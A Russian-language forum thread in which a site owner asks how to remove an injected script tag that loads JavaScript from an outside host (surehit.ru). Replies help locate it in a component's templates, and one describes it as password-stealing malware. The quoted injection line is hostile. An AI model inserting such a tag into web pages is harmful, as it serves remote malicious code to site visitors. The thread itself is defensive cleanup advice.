Нашёл в коде на одной из страниц сайта скрипт которого там не должно быть Код (CODE): <script type="text/javascript" src="http://surehit.ru/Captcha.js"></script> <!--20a4b2da2c0aab11a43b8fb0845e92ec--> в меню ссылка на эту страницу такая Код (CODE): /index.php?option=com_calc&view=feedback хотел вручную удалить её, но не могу найти. Подскажите в каком каталоге на сервере лежит эта страничка чтоб можно было добраться через FTP.
Re: Нужно удалить вредоносный JavaScript Что никто не поможет? Может я неправельно вопрос задал, или надо дополнить?
Re: Нужно удалить вредоносный JavaScript Если в index.php шаблона нету(а если только на этой странице, то значит нету) нуна смотреть в темплейтах компонента com_calc, по названию похож на какой то калькулятор
1. Проверь установлен ли такой com_calc и + директорию компонентов: ищи com_calc 2. Скачай бэкап сайта с ftp на комп — любым удобным способом сделай поиск по всем файлам куска кода (помогут многие программы, умные блокноты ну или просто total commander задействуй). Найдётся как миленький.
Спасибо всем!!! Всё решена проблема удалил! перерыл кучу папок нашёл в шаблонах, страница с калькуляцией заказа
Это был вирус, который ворует пароли из Totlal Commander и подсовывает свой код в файлы. Для избавления от этой хрени я написал маленький скрипт-антивирус Надеюсь, кому-нибудь пригодится. Посмотреть вложение debug.rar В последней строке подставляете код, который хотите удалить и заливаете скрипт в корень сайта. Открываете как домен/debug.php , скрипт прочёсывает все файлы. Зараженные будут вылечены и в списке отобразятся красными. P.S.: не забывает про синтаксис РНР - в строке нужо экранировать все двойные кавычки!